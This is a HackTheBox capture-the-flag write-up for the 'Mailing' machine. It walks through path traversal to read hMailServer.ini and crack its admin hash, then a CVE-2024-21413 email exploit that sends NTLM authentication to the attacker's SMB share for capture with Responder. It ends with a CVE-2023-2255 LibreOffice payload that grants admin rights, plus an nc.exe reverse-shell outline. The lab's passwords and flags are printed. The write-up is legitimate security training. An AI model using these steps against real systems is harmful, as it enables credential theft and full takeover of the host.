HackTheBox Mailing
Writeup for HackTheBox Mailing
HackTheBox Mailing
Machine Synopsis
Mailing is an easy Windows machine that runs hMailServer and hosts a website vulnerable to Path Traversal. This vulnerability can be exploited to access the hMailServer configuration file, revealing the Administrator password hash. Cracking this hash provides the Administrator password for the email account. We leverage CVE-2024-21413 in the Windows Mail application on the remote host to capture the NTLM hash for user maya. We can then crack this hash to obtain the password and log in as user maya via WinRM. For privilege escalation, we exploit CVE-2023-2255 in LibreOffice. (Source)
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
❯ nmap -sC -sV -A 10.10.11.14
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: TOP USER UIDL
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: ACL IMAP4 IMAP4rev1 CAPABILITY QUOTA RIGHTS=texkA0001 NAMESPACE completed IDLE OK SORT CHILDREN
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp open smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp open ssl/imap hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_imap-capabilities: ACL IMAP4 IMAP4rev1 CAPABILITY QUOTA RIGHTS=texkA0001 NAMESPACE completed IDLE OK SORT CHILDREN
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Lets add the domain to our /etc/hosts and check out the website.
1
❯ echo -e '10.10.11.14\t\tmailing.htb' | sudo tee -a /etc/hosts
At the bottom of the webpage, there is a download instructions for how to connect to the mail server but there seems to be nothing interesting other than a possible user called maya@mailing.htb.
Checking the metadata of the file also revealed nothing much.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
❯ exiftool instructions.pdf
ExifTool Version Number : 13.00
File Name : instructions.pdf
Directory : .
File Size : 1705 kB
File Modification Date/Time : 2025:01:11 14:33:57+08:00
File Access Date/Time : 2025:01:11 14:33:57+08:00
File Inode Change Date/Time : 2025:01:11 14:33:57+08:00
File Permissions : -rw-rw-r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.7
Linearized : No
Page Count : 16
Language : es
Tagged PDF : Yes
XMP Toolkit : 3.1-701
Producer : Microsoft® Word para Microsoft 365
Creator : Ruy Alonso Fernández
Creator Tool : Microsoft® Word para Microsoft 365
Create Date : 2024:03:11 18:46:08+01:00
Modify Date : 2024:03:11 18:46:08+01:00
Document ID : uuid:8E915C28-9456-4488-BB12-8E3445231916
Instance ID : uuid:8E915C28-9456-4488-BB12-8E3445231916
Author : Ruy Alonso Fernández
Lets look for any interesting endpoints then.
1
2
3
4
5
❯ ffuf -c -u "http://mailing.htb/FUZZ" -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-files.txt
...
index.php [Status: 200, Size: 4681, Words: 1535, Lines: 133, Duration: 12ms]
download.php [Status: 200, Size: 31, Words: 5, Lines: 1, Duration: 13ms]
...
Exploitation
download.php was the endpoint when we download the instruction pdf file.
The file parameter turns out to be vulnerable to LFI.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ curl 'http://mailing.htb/download.php?file=../../windows/system32/drivers/etc/hosts'
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 mailing.htb
curl 'http://mailing.htb/download.php?file=..\\..\\windows\\system32\\drivers\\etc\\hosts'would work too.Interestingly, we could have found this vulnerability using
wapititoo.
Searching for hMailServer config location on Google resulted in this forum which tells us that the config data is the hMailServer.ini located at C:\Program Files (x86)\hMailServer\Bin.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ curl 'http://mailing.htb/download.php?file=../../Program+Files+(x86)/hMailServer/bin/hMailServer.ini'
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
Cracking the AdministratorPassword hash 841bb5acfa6779ae432fd7a4e6600ba7 on CrackStation revealed the password homenetworkingadministrator .
Trying the credential on both nxc and telnet resulted in nothing interesting.
1
2
3
❯ nxc smb mailing.htb -u administrator -p 'homenetworkingadministrator'
SMB 10.10.11.14 445 MAILING [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.10.11.14 445 MAILING [-] MAILING\administrator:homenetworkingadministrator STATUS_LOGON_FAILURE
1
2
3
4
5
6
7
8
9
10
11
❯ telnet 10.10.11.14 110
Trying 10.10.11.14...
Connected to 10.10.11.14.
Escape character is '^]'.
+OK POP3
USER administrator@mailing.htb
+OK Send your password
PASS homenetworkingadministrator
+OK Mailbox locked and ready
LIST
+OK 0 messages (0 octets)
Searching for outlook exploit cve on Google resulted in CVE-2024-21413. We will be using this GitHub repo for our exploit.
1
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.6\share\' --subject "MAYA READ THIS EMAIL QUICK"
Lets turn on our Responder to capture any incoming connections.
1
2
3
4
5
6
7
❯ sudo responder -I tun0
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.14
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash : maya::MAILING:8ca5d07548835faa:C8D0C9542104C0282B6794A5A0FEACDC:01010000000000000063211C4664DB0109A86572B3D7BC2800000000020008004A004E004900330001001E00570049004E002D004A004A0031003200520057004300410043003300380004003400570049004E002D004A004A003100320052005700430041004300330038002E004A004E00490033002E004C004F00430041004C00030014004A004E00490033002E004C004F00430041004C00050014004A004E00490033002E004C004F00430041004C00070008000063211C4664DB0106000400020000000800300030000000000000000000000000200000010AEB5C675343492C74FCB7070CF58B0FA02A7FBDB757FC5F2E2812BEDCC8B10A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0036000000000000000000
Captured maya hashes. Lets crack them with hashcat.
1
2
3
4
5
6
7
❯ hashcat -m 5600 -a 0 maya.hash /usr/share/wordlists/rockyou.txt
MAYA::MAILING:8ca5d07548835faa:c8d0c9542104c0282b6794a5a0feacdc:01010000000000000063211c4664db0109a86572b3d7bc2800000000020008004a004e004900330001001e00570049004e002d004a004a0031003200520057004300410043003300380004003400570049004e002d004a004a003100320052005700430041004300330038002e004a004e00490033002e004c004f00430041004c00030014004a004e00490033002e004c004f00430041004c00050014004a004e00490033002e004c004f00430041004c00070008000063211c4664db0106000400020000000800300030000000000000000000000000200000010aeb5c675343492c74fcb7070cf58b0fa02a7fbdb757fc5f2e2812bedcc8b10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0036000000000000000000:m4y4ngs4ri
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Lets enumerate with maya credentials.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
❯ nxc smb mailing.htb -u maya -p m4y4ngs4ri
SMB 10.10.11.14 445 MAILING [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.10.11.14 445 MAILING [+] MAILING\maya:m4y4ngs4ri
❯ nxc winrm mailing.htb -u maya -p m4y4ngs4ri
WINRM 10.10.11.14 5985 MAILING [*] Windows 10 / Server 2019 Build 19041 (name:MAILING) (domain:MAILING)
WINRM 10.10.11.14 5985 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
❯ nxc smb mailing.htb -u maya -p m4y4ngs4ri --shares
SMB 10.10.11.14 445 MAILING [*] Windows 10 / Server 2019 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB 10.10.11.14 445 MAILING [+] MAILING\maya:m4y4ngs4ri
SMB 10.10.11.14 445 MAILING [*] Enumerated shares
SMB 10.10.11.14 445 MAILING Share Permissions Remark
SMB 10.10.11.14 445 MAILING ----- ----------- ------
SMB 10.10.11.14 445 MAILING ADMIN$ Admin remota
SMB 10.10.11.14 445 MAILING C$ Recurso predeterminado
SMB 10.10.11.14 445 MAILING Important Documents READ,WRITE
SMB 10.10.11.14 445 MAILING IPC$ READ IPC remota
We can use connect to winrm using maya credentials.
1
2
3
4
5
6
7
❯ evil-winrm -i mailing.htb -u maya -p m4y4ngs4ri
Evil-WinRM shell v3.7
...
*Evil-WinRM* PS C:\Users\maya\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\maya\Desktop> type user.txt
b33ed429f0862d0a479554b0af92d768
Privilege Escalation
Enumerate around the host with maya user.
1
2
3
4
5
6
7
8
9
10
11
12
13
*Evil-WinRM* PS C:\Users> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/28/2024 8:50 PM .NET v2.0
d----- 2/28/2024 8:50 PM .NET v2.0 Classic
d----- 2/28/2024 8:50 PM .NET v4.5
d----- 2/28/2024 8:50 PM .NET v4.5 Classic
d----- 2/28/2024 8:50 PM Classic .NET AppPool
d----- 3/9/2024 1:52 PM DefaultAppPool
d----- 3/4/2024 8:32 PM localadmin
d----- 2/28/2024 7:34 PM maya
d-r--- 3/10/2024 4:56 PM Public
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users> cd C:\
*Evil-WinRM* PS C:\> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/10/2024 5:32 PM Important Documents
d----- 2/28/2024 8:49 PM inetpub
d----- 12/7/2019 10:14 AM PerfLogs
d----- 3/9/2024 1:47 PM PHP
d-r--- 3/13/2024 4:49 PM Program Files
d-r--- 3/14/2024 3:24 PM Program Files (x86)
d-r--- 3/3/2024 4:19 PM Users
d----- 4/29/2024 6:58 PM Windows
d----- 4/12/2024 5:54 AM wwwroot
1
2
3
*Evil-WinRM* PS C:\> cd 'Important Documents'
*Evil-WinRM* PS C:\Important Documents> ls
<nothing>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
*Evil-WinRM* PS C:\Important Documents> cd C:\'Program Files'
*Evil-WinRM* PS C:\Program Files> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2024 5:30 PM Common Files
d----- 3/3/2024 4:40 PM dotnet
d----- 3/3/2024 4:32 PM Git
d----- 4/29/2024 6:54 PM Internet Explorer
d----- 3/4/2024 6:57 PM LibreOffice
d----- 3/3/2024 4:06 PM Microsoft Update Health Tools
d----- 12/7/2019 10:14 AM ModifiableWindowsApps
d----- 2/27/2024 4:58 PM MSBuild
d----- 2/27/2024 5:30 PM OpenSSL-Win64
d----- 3/13/2024 4:49 PM PackageManagement
d----- 2/27/2024 4:58 PM Reference Assemblies
d----- 3/13/2024 4:48 PM RUXIM
d----- 2/27/2024 4:32 PM VMware
d----- 3/3/2024 5:13 PM Windows Defender
d----- 4/29/2024 6:54 PM Windows Defender Advanced Threat Protection
d----- 3/3/2024 5:13 PM Windows Mail
d----- 3/3/2024 5:13 PM Windows Media Player
d----- 4/29/2024 6:54 PM Windows Multimedia Platform
d----- 2/27/2024 4:26 PM Windows NT
d----- 3/3/2024 5:13 PM Windows Photo Viewer
d----- 4/29/2024 6:54 PM Windows Portable Devices
d----- 12/7/2019 10:31 AM Windows Security
d----- 3/13/2024 4:49 PM WindowsPowerShell
There is an unusual software LibreOffice. Lets enumerate around for the version number.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
*Evil-WinRM* PS C:\Program Files> cd LibreOffice
*Evil-WinRM* PS C:\Program Files\LibreOffice> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/4/2024 6:57 PM help
d----- 3/4/2024 6:57 PM presets
d----- 3/14/2024 4:01 PM program
d----- 3/4/2024 6:57 PM readmes
d----- 3/4/2024 6:57 PM share
-a---- 6/10/2022 4:14 PM 1807470 CREDITS.fodt
-a---- 7/7/2022 1:05 PM 574491 LICENSE.html
-a---- 7/7/2022 1:09 PM 503055 license.txt
-a---- 7/6/2022 11:40 PM 3706 NOTICE
*Evil-WinRM* PS C:\Program Files\LibreOffice> cd program
*Evil-WinRM* PS C:\Program Files\LibreOffice\program> ls
...
version.ini
...
*Evil-WinRM* PS C:\Program Files\LibreOffice\program> type version.ini
...
MsiProductVersion=7.4.0.1
...
*Evil-WinRM* PS C:\Program Files\LibreOffice\program> cd ..
*Evil-WinRM* PS C:\Program Files\LibreOffice> cd readmes
*Evil-WinRM* PS C:\Program Files\LibreOffice\readmes> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/7/2022 5:57 PM 16144 readme_en-GB.txt
-a---- 7/7/2022 5:57 PM 16146 readme_en-US.txt
-a---- 7/7/2022 5:57 PM 16150 readme_en-ZA.txt
-a---- 7/7/2022 5:57 PM 17545 readme_es.txt
*Evil-WinRM* PS C:\Program Files\LibreOffice\readmes> type readme_en-GB.txt
...
LibreOffice 7.4 ReadMe
...
Searching for libreoffice 7.4 vulnerabilities privilege escalation in Google resulted in this Snyk page revealing CVE-2023-2255.
We can get the exploit from this GitHub repo.
1
2
3
4
5
6
❯ python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output exploit_admin.odt
File exploit_admin.odt has been created !
❯ smbclient '//10.10.11.14/Important Documents' --user maya --password m4y4ngs4ri
Try "help" to get a list of possible commands.
smb: \> put exploit_admin.odt
Note: any files uploaded to
Important Documentswill be triggered and deleted shortly after.
Exit the old evil-winrm shell and spawn a new evil-winrm shell as maya.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
❯ evil-winrm -i mailing.htb -u maya -p m4y4ngs4ri
...
*Evil-WinRM* PS C:\Users\maya\Documents> net user maya
User name maya
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2024-04-12 3:16:20 AM
Password expires Never
Password changeable 2024-04-12 3:16:20 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2025-01-11 11:30:27 AM
Logon hours allowed All
Local Group Memberships *Administradores *Remote Management Use
*Usuarios *Usuarios de escritori
Global Group memberships *Ninguno
The command completed successfully.
*Evil-WinRM* PS C:\Users\maya\Documents> type C:\Users\localadmin\Desktop\root.txt
6de3198de3342e00c586d5d98a7feedd
Alternatively, we can transfer a
nc.exefile over and get a reverse shell.
- Create the
exploit.odtfile.
- Put the
nc.exeandexploit.odtfiles.
- Important: copy the
nc.exefile toProgramDatabecause once the files inImportant Documentsare executed, they are deleted from the folder.
- Wait for the reverse shell connection.
This post is licensed under CC BY 4.0 by the author.